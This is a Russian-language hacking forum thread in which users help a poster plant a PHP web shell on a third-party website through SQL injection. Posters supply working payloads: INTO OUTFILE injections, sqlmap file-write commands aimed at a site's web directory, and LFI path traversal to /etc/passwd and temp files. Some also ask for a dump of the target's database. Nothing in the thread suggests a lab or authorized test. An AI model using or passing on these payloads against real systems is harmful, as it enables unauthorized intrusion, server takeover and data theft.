Добрый день.

Есть сайт с ошибкой

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in var\www\core\mods\groups\deletegroup.php on line 20

Как залить шелл, есть пути и file priv Y ?

CURRENT USER -ROOT

Основные способы:

1) Использовать юзер-функции

2) INTO [DUMPFILE|OUTFILE]

Ты сайт выложи сюда

Вообщем смог раскрутить через sqlmap, есть доступ к базе, насчет прав - пишет root@localhost. права на чтение и запись есть.функция load_file работает, получилось получить файл "/etc/passwd

Ну вот пытаюсь залить через sqlmap командой --file-write="C:\путь\тут php файл " --file-dest="путь"

выдает мне такое http://www.uppic.org/image-290A_52349E6D.jpg

на папке прав на запись в папке, ищи другую

Да вот странно имею такие привилегии http://www.uppic.org/image-49B6_5234A73E.jpg

А залить даже в temp не могу

какие такие? у тебя рут права только в майскул, в фс они отношения не имеют

может знаний не хватает? раз софтом пытаешься шелл залить..

хватит флудить, есть статья от нолика, начни оттуда,а эта тема обсуждалась тут со времен динозавров.

ТС, можешь сделать дамп БД?

И что за сайт то?

база на том же сервере? файлы читать можешь? Прочитай хотябы тот файл где ошибку показывает. Ну или конфиг апач\нжнкс \ етк посомтри, или hosts

Если все ок, ищи диру под запись.

Файлы читаются. Файл с ошибкой читается.

--file-write="C:\путь\тут php файл "

Что за путь здесь нужно указывать?

--file-dest="путь" здесь я так понял путь к файлам сайта

Ручками залей уже

vuln=1 limit 1 into outfile '/PathToShell/filename.php' lines terminated by ""--+

или

vuln=1 limit 1 into outfile ''/PathToShell/filename.php' fields terminated by '' optionally enclosed by ""--+​

2 Sat-hacker

вобщемта тут и понимать нечего -hh опция все покажет.

--file-write=WFILE Write a local file on the back-end DBMS file system

--file-dest=DFILE Back-end DBMS absolute filepath to write to

решил попробовать заюзать lfi найденный не так давно на неком сайте

оказалось что картинки подгрузить нельзя а другими путями я ниразу не ходил

есть доступ к phpinfo и php.ini

подскажите хороший мануал =(

Классика https://rdot.org/forum/showthread.ph...hlight=phpinfo

заюзал скрипт и при инклуде у меня пустая страничка

perl lfi.pl httр//site.com/i.php httр://www.site.com/index.php?page=../../../../../../../../../../../../../../etc/passwd%00

как только скрипт выполняется я копирую имя файла tmp/******

и инклужу

http://www.site.com/index.php?page=../../../../../../../../../../../../../../tmp/******%00

что может быть не так?? в скрипте ничего менять не надо??

Я это читал но не могу вкурить,обьясните если можна

В sqlmap --file-write="C:\shell.php" sqlmap берет шелл куда ты его положил на своем жд, --file-dest="/var/www/html/site.com" это куда sqlmap будет копировать файл шелла на сервере, при условии что есть права на запись файла.

К примеру так.

python sqlmap.py -u "http://dcsdcsdcds.com/index.php?id=12

--random-agent --file-write="C:\sqlmap\shell.php" --file-dest="var/www/html/dcsdcsdcds.com/images/"

товарищи, кто нибудь использует сокращение команд? -z. Удобно же.